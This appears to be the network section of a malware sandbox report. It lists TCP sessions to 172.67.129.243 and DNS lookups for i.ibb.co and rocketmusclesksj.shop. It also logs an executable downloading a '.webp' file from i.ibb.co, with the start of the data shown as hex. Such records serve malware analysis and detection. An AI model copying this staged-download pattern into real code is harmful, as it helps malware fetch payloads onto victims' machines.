Apr 20, 2024 13:23:15.352094889 CEST	49742	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.352173090 CEST	49742	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.352384090 CEST	443	49742	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:15.858537912 CEST	443	49742	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:15.858797073 CEST	443	49742	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:15.858895063 CEST	49742	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.861241102 CEST	49742	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.861274958 CEST	443	49742	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:15.867718935 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.867798090 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:15.867907047 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.868196011 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.868218899 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.093839884 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.094029903 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.095757961 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.095809937 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.096936941 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.098881960 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.098882914 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.099021912 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.637167931 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.637355089 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.637439013 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.637522936 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.637597084 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.637671947 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.637734890 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.637769938 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.637798071 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.637810946 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.637880087 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.637942076 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.638032913 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.638108969 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.638292074 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.638328075 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.640772104 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.641100883 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.641102076 CEST	49743	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.641164064 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.641201973 CEST	443	49743	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.693145037 CEST	49744	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.693223953 CEST	443	49744	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.693387985 CEST	49744	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.693826914 CEST	49744	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.693864107 CEST	443	49744	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.918276072 CEST	443	49744	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.918478966 CEST	49744	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.920624018 CEST	49744	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.920675993 CEST	443	49744	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.921049118 CEST	443	49744	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.925427914 CEST	49744	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.925427914 CEST	49744	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.925549984 CEST	443	49744	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:16.925925970 CEST	49744	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:16.925980091 CEST	443	49744	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:17.769624949 CEST	443	49744	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:17.769876957 CEST	443	49744	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:17.769994020 CEST	49744	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:17.769994020 CEST	49744	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:17.796605110 CEST	49745	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:17.796686888 CEST	443	49745	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:17.796771049 CEST	49745	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:17.797087908 CEST	49745	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:17.797116995 CEST	443	49745	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.022819042 CEST	443	49745	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.022908926 CEST	49745	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.033323050 CEST	49745	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.033365965 CEST	443	49745	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.033765078 CEST	443	49745	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.035201073 CEST	49745	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.035399914 CEST	49745	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.035439968 CEST	443	49745	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.550147057 CEST	443	49745	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.550365925 CEST	443	49745	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.550434113 CEST	49745	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.550677061 CEST	49745	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.550709009 CEST	443	49745	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.624030113 CEST	49746	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.624139071 CEST	443	49746	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.624213934 CEST	49746	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.624629021 CEST	49746	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.624705076 CEST	443	49746	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.852761030 CEST	443	49746	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.852901936 CEST	49746	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.858100891 CEST	49746	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.858151913 CEST	443	49746	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.858568907 CEST	443	49746	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.860646963 CEST	49746	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.860929966 CEST	49746	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.861017942 CEST	443	49746	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:18.861223936 CEST	49746	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:18.861257076 CEST	443	49746	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:19.433317900 CEST	443	49746	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:19.433562040 CEST	443	49746	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:19.433819056 CEST	49746	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:19.435025930 CEST	49746	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:19.435086012 CEST	443	49746	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:19.489573002 CEST	49747	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:19.489649057 CEST	443	49747	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:19.489758968 CEST	49747	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:19.490151882 CEST	49747	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:19.490217924 CEST	443	49747	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:19.718156099 CEST	443	49747	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:19.718514919 CEST	49747	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:19.719590902 CEST	49747	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:19.719640970 CEST	443	49747	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:19.720230103 CEST	443	49747	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:19.721391916 CEST	49747	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:19.721517086 CEST	49747	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:19.721560001 CEST	443	49747	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.233561993 CEST	443	49747	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.233870029 CEST	443	49747	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.233926058 CEST	49747	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.233926058 CEST	49747	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.249119043 CEST	49748	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.249150038 CEST	443	49748	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.249383926 CEST	49748	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.249567986 CEST	49748	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.249572992 CEST	443	49748	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.475979090 CEST	443	49748	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.476123095 CEST	49748	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.477355003 CEST	49748	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.477368116 CEST	443	49748	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.477691889 CEST	443	49748	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.478894949 CEST	49748	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.478979111 CEST	49748	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.478984118 CEST	443	49748	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.987221956 CEST	443	49748	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.987452030 CEST	443	49748	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:20.987498045 CEST	49748	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.988060951 CEST	49748	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:20.988080978 CEST	443	49748	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:21.909503937 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:21.909564972 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:21.909631968 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:21.910553932 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:21.910573006 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.136687994 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.136763096 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.138284922 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.138294935 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.138778925 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.149791956 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.150790930 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.150852919 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.150942087 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.150980949 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.151081085 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.151134968 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.151206017 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.151372910 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.151402950 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.151427031 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.151469946 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.151526928 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.151653051 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.151700020 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.151837111 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.151868105 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.151885986 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.151904106 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.151949883 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.151982069 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.151998043 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.152064085 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.152190924 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.152220964 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.152226925 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.152265072 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.152312040 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.152343035 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.361248970 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.361388922 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.361448050 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.361566067 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.361679077 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:22.361732006 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:22.465992928 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:23.742085934 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:23.742180109 CEST	443	49749	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:23.742249966 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:23.742438078 CEST	49749	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:23.742486000 CEST	443	49749	172.67.129.243	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 13:22:01.163861036 CEST	50865	53	192.168.2.4	1.1.1.1
Apr 20, 2024 13:22:01.269479990 CEST	53	50865	1.1.1.1	192.168.2.4
Apr 20, 2024 13:23:14.908081055 CEST	61522	53	192.168.2.4	1.1.1.1
Apr 20, 2024 13:23:15.046722889 CEST	53	61522	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 20, 2024 13:22:00.583348989 CEST	192.168.2.4	8.8.8.8	4d5a		Echo
Apr 20, 2024 13:22:00.687822104 CEST	8.8.8.8	192.168.2.4	555a		Echo Reply

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 20, 2024 13:22:01.163861036 CEST	192.168.2.4	1.1.1.1	0xa845	Standard query (0)	i.ibb.co	A (IP address)	IN (0x0001)	false
Apr 20, 2024 13:23:14.908081055 CEST	192.168.2.4	1.1.1.1	0xb49e	Standard query (0)	rocketmusclesksj.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 20, 2024 13:22:01.269479990 CEST	1.1.1.1	192.168.2.4	0xa845	No error (0)	i.ibb.co	169.197.85.95	A (IP address)	IN (0x0001)	false
Apr 20, 2024 13:23:15.046722889 CEST	1.1.1.1	192.168.2.4	0xb49e	No error (0)	rocketmusclesksj.shop	172.67.129.243	A (IP address)	IN (0x0001)	false
Apr 20, 2024 13:23:15.046722889 CEST	1.1.1.1	192.168.2.4	0xb49e	No error (0)	rocketmusclesksj.shop	104.21.2.252	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

i.ibb.co

rocketmusclesksj.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	169.197.85.95	443	7272	C:\Users\user\Desktop\2M1NS61GG8.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 11:22:01 UTC	81	OUT	GET /bLNQtdR/1667-Final.webp HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive
2024-04-20 11:22:01 UTC	381	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 20 Apr 2024 11:22:01 GMT Content-Type: image/webp Content-Length: 680277 Connection: close Last-Modified: Sat, 30 Mar 2024 20:14:11 GMT Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Cache-Control: public Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, OPTIONS Accept-Ranges: bytes
2024-04-20 11:22:01 UTC	3715	IN	Data Raw: 52 49 46 46 30 8e 02 00 57 45 42 50 56 50 38 20 24 8e 02 00 b0 98 09 9d 01 2a b0 04 84 03 3e 81 38 97 48 a5 23 22 26 2a 76 4a e8 c0 10 09 63 65 6d ab d7 7f 4b bc ff 0a 7e 86 4a 87 eb 9c 2c 34 3a 78 71 d1 ce cb ff ff 4c 1f d8 54 8d 11 b3 1b de 34 0f 76 6d 48 6b ee 21 1a 1b bf 7f de 7f 63 3c 85 3c bf fb af b0 07 f2 df e9 5e 95 38 1b fb df a8 07 18 dd 02 ff e7 fa 11 d2 33 fd ef 21 3f 6e 5d 7a 55 6f ef ab 9f 11 24 df 94 7c a9 cf 8f 89 af f4 f8 b9 ef 9f fa 3c f1 bd af bf 0f fe 5f 5b 3f da bf e8 fb 09 7f 6c f4 99 ff a7 f7 3f df b7 99 ff dd 9f 58 ef fd ff ba be f8 bf c9 fa 89 7f 5a ff 9f eb af eb 03 fe 7b d4 9f f7 6b d6 83 d6 07 fc 17 ff 2f 4e 5f 50 0f fe fe da bf c0 3f fa f4 37 fa 2f fe 4f 30 9f 49 ff 1f bf 9f cf fe f9 fe 87 ed 4f ec ef ce 87 f3 39 5f f8 bf f5 Data Ascii: RIFF0WEBPVP8 $>8H#"&vJcemK~J,4:xqLT4vmHk!c<<^83!?n]zUo$\|<_[?l?XZ{k/N_P?7/O0IO9_
2024-04-20 11:22:01 UTC	4096	IN	Data Raw: b3 d1 33 57 94 b5 f5 72 72 75 f6 34 f0 b7 d8 2e 7f 71 de 9a 41 f3 b3 8c e2 71 e4 63 b7 db 11 3a d4 14 55 03 65 d3 1b a6 a7 5f 30 a1 c0 b5 85 74 9d 70 b9 71 28 ba f5 22 76 76 c8 ba 34 cd 7d f7 5f cd ed 2f 73 df 2c da ac f7 80 cd ec 0a 56 5b f5 1e 05 99 ce 3e f9 60 14 fa e7 1c c7 65 4d 27 d3 bb e8 fc 2a 1b 2b 35 28 66 e7 5c 02 b0 e1 2b de be 3b db f6 2e 94 5d 2f 50 45 97 b6 6c 50 8a 6c f4 5d bb 4c da a8 64 d2 bc 82 4e 99 98 c7 31 9f 13 b6 63 0d b6 aa b3 f4 6d e5 b5 45 7a a4 53 8a 24 98 26 2c 5f d5 b7 a2 f7 5e 1e 5c b2 00 fd 49 5a 45 91 3b 8f 66 bd f3 96 3d e7 1c 27 a7 00 9b 2f 8c 17 fb 20 18 e9 62 d8 b6 22 43 57 40 27 10 05 77 f0 e5 e9 57 2b 9b ce 78 f8 f2 9c b2 60 29 03 67 09 ca c3 74 07 18 27 da bb ce 4b 2d a2 23 17 df 8f ef de 7f 41 ca 98 0b 64 14 2a 1e Data Ascii: 3Wrru4.qAqc:Ue_0tpq("vv4}_/s,V[>`eM'+5(f\+;.]/PElPl]LdN1cmEzS$&,_^\IZE;f='/ b"CW@'wW+x`)gt'K-#Ad
2024-04-20 11:22:01 UTC	4096	IN	Data Raw: 66 da 7d b6 6e 30 e6 45 5d 71 f6 64 53 c2 b3 67 15 7e b6 fd ea 80 87 2e 3a ba 69 59 59 cd 60 d5 f8 1e 4f 6c 45 ff ff f2 a2 94 09 d0 86 59 44 7b 1f 05 4c 58 4a d1 48 b5 e4 84 82 8f ca 3f 3c 20 59 01 48 53 a6 94 93 34 29 eb b8 aa 9a 87 9e 84 4e 02 39 81 7f f1 7e ba 84 11 57 e9 d7 4f 44 b5 5b 69 a9 dc 68 ce 44 5a 8e 4c cd fd 37 98 ec df 25 d3 06 20 00 ca 69 00 b0 63 f4 a9 d5 ca 98 94 2a 6b 90 7a 04 fc f3 cf 8a 3c 3d cf 2c d3 f8 07 98 af b0 d5 fc 6c 64 12 59 80 46 8e 48 df ec 31 37 92 d9 ea cf 2b ff b5 7f 2e 79 d4 7f e2 3a 5e fe ab 17 b0 e9 46 ae 6e 9c f0 13 83 9a 01 8f fb a1 e7 3d e2 2d cb e6 6c 11 12 f8 2a 9e ad 09 88 a4 5a 76 38 e8 d8 a0 07 21 99 d3 a6 c6 10 4b 8c 48 77 45 1f ce 6e 07 bc d7 15 36 af 8e cc e1 c7 90 55 7c 82 7e 10 92 9d 52 a6 ee 33 b5 f8 94 Data Ascii: f}n0E]qdSg~.:iYY`OlEYD{LXJH?< YHS4)N9~WOD[ihDZL7% ickz<=,ldYFH17+.y:^Fn=-lZv8!KHwEn6U\|~R3
2024-04-20 11:22:01 UTC	4096	IN	Data Raw: 6a 77 f2 08 9e d7 f5 66 e9 73 fd 23 aa 62 4e 8b 14 2e 79 ff 22 18 33 8e ec ca c1 14 c5 e1 14 42 b4 fc 56 50 d4 93 14 40 09 88 03 e8 2b a4 e9 1a ce 4b 05 53 1e 6a 37 3d 51 05 32 da 30 bf ff 99 8f 2a 05 e3 38 e4 bc 5d 5d 7a 01 ce ea d5 df 48 8e 1a e2 d8 f7 65 00 7c 1b 80 1d 25 cd b5 45 ac e8 13 af 4d a9 9b 40 48 7f 7a 1e ac 2d 41 2f 2b 25 e2 bb 8a d3 81 99 d7 06 b5 40 79 7a 37 bb 7e 14 5c 70 8f 43 85 4c c7 0a 93 b5 fa f9 ed cf 31 c0 7d 96 21 d5 fc 00 7a 16 9d cb a0 af 17 a7 11 90 8e bd d7 f4 9d a5 0c cc 20 6c 0b 94 a2 6a 2f de 80 3f 39 5f 20 af 5c 94 c3 da 93 e6 b2 96 d5 b7 d1 2d 88 50 a6 ac 7c 0a 50 d0 ae 5f 97 ef ae 35 25 0e c7 3d 39 7a 6b bc de d5 55 d0 3a 13 05 80 bd fa a8 9f 61 88 54 25 31 f8 3f 3c 70 b2 21 41 e3 b3 7d d7 a7 71 71 c1 71 b1 bd 79 8f 79 Data Ascii: jwfs#bN.y"3BVP@+KSj7=Q20*8]]zHe\|%EM@Hz-A/+%@yz7~\pCL1}!z lj/?9_ \-P\|P_5%=9zkU:aT%1?<p!A}qqqyy
2024-04-20 11:22:01 UTC	4096	IN	Data Raw: 19 d2 92 84 e8 c3 38 d0 47 1e bc bd 77 5a da c5 50 40 6c 7c 48 50 37 e4 1b 97 d5 39 db 8d 85 42 d6 d0 70 dc 7e b5 b8 fb a1 06 d0 cb 68 78 b2 2b 9f e2 6c b7 28 c2 79 1a b3 93 9c e8 cd 8c 3f bb c3 fe 06 01 80 ca cb 55 55 bb 20 16 cc 5e ec c9 2d 5e 92 ee 79 b0 85 4d c3 f9 50 6d f8 1f b5 58 77 4c 2c 2b 2b ed 33 18 f4 cf 08 ec 21 8e 79 8d df b3 76 27 23 1f 46 3f 8d b6 04 15 62 98 26 7a b6 f6 d5 94 40 7b 90 35 51 aa 82 c5 a1 91 3b e4 14 a7 53 21 95 79 53 a6 3f de 20 b6 21 5d be 4f 17 e6 09 75 ee bc dd 13 c2 1e 14 38 c2 8a f1 ef f1 44 87 9c 51 62 9f 45 36 1f 3c bd 95 cb 64 0d 86 23 ad 74 ce 39 a5 ee 32 dd ed c0 bf c2 bd a6 5c 49 87 b5 76 32 eb d3 f7 13 96 3f 58 02 7f e8 0e 9f 17 d7 d6 98 d3 29 10 77 a3 18 b9 05 19 8f 76 19 28 62 aa 7e c4 23 ff b3 c2 70 9c 7a 1e Data Ascii: 8GwZP@l\|HP79Bp~hx+l(y?UU ^-^yMPmXwL,++3!yv'#F?b&z@{5Q;S!yS? !]Ou8DQbE6<d#t92\Iv2?X)wv(b~#pz
2024-04-20 11:22:01 UTC	4096	IN	Data Raw: 3b ae 2d fb 2b 36 b4 c7 0e 8b c4 eb fe 07 b4 b5 06 6b 22 7d f5 aa fe d3 b9 27 b3 1d c1 50 09 8a 82 f0 9c 45 7d cb 4a 93 2c e7 8e d2 22 57 0e 00 92 12 81 89 d9 59 d2 e7 82 39 25 6a d8 4e 8f 82 81 56 79 36 1b ef 6d 3d 69 33 51 55 98 ea 83 d3 4f 0c a9 17 3d 5a a5 f3 5a c9 ff 8f cc 2b dd 4d 68 56 71 70 62 bd d7 49 3c fe 31 fc 87 ee ac 6c 8a b7 56 1d 06 ce 1b 58 e6 5a af 22 1e cb e5 e5 33 4f 02 b9 37 ba cc 71 33 e7 ed 1c 5a 2d b6 b3 b8 8c 79 f0 02 f5 29 c4 11 b9 66 b3 a1 21 07 17 27 6d 9c c4 20 d9 3d f0 45 42 e0 35 cd 07 be 72 ad 96 ef d2 af 8c 1d 74 d6 c1 aa 42 bf 19 a5 91 0e 64 0f 1a 39 28 a8 aa e2 0a 09 a7 1d b5 d1 db ac 9b 90 8e 10 34 e0 87 c9 e9 de 07 a8 8b 6e 54 63 af fe 3e 03 00 a7 61 15 47 8e fa 22 43 39 34 4e 70 b4 9b 58 74 74 99 77 00 cf a0 da 7d e9 Data Ascii: ;-+6k"}'PE}J,"WY9%jNVy6m=i3QUO=ZZ+MhVqpbI<1lVXZ"3O7q3Z-y)f!'m =EB5rtBd9(4nTc>aG"C94NpXttw}
2024-04-20 11:22:01 UTC	4096	IN	Data Raw: d8 55 13 38 03 78 b2 9d 80 07 dd 87 85 99 7a f2 f0 94 11 b5 a6 62 58 27 e6 8a 49 bd fc 13 5c 75 bb 54 fe 48 77 aa 9e dc 3e f9 8d 7e 8d 53 47 f4 21 36 9b 94 13 06 d8 35 e4 9f e2 e3 2d 2e 99 f9 d6 c4 38 7b 55 bd 4a d9 78 26 9b c2 bb 56 85 5c 86 55 e4 97 3c d8 67 55 4f 06 88 c9 5e 59 18 13 b6 7a 7d 2f e9 c8 d4 7a f0 ea f6 27 a6 41 0d e3 8a 25 58 6d fb 39 ea 3e f9 73 fa a2 87 9c 5f a4 c2 60 27 bc b1 01 62 9e e9 b5 f2 1c 62 08 ef c2 ae e5 a9 91 b5 9e 2d 98 64 0c 8e d7 b0 93 f9 e2 46 04 f2 24 83 7a eb 3e c0 1c af 11 79 f6 2e 99 ed ea a1 73 4b 74 bd 04 15 0b 52 b5 17 81 f0 20 d8 a8 97 ee 39 0c 37 17 a0 ca 25 95 d2 71 39 90 55 c5 1b e2 c6 51 f9 6e 00 21 2e 48 cd 38 6f a4 b5 f7 8d f2 89 d1 77 41 0b 33 41 37 89 ee a0 fb 6d c0 a3 aa 47 6d 95 07 6a 9f 71 5e 86 63 73 Data Ascii: U8xzbX'I\uTHw>~SG!65-.8{UJx&V\U<gUO^Yz}/z'A%Xm9>s_`'bb-dF$z>y.sKtR 97%q9UQn!.H8owA3A7mGmjq^cs
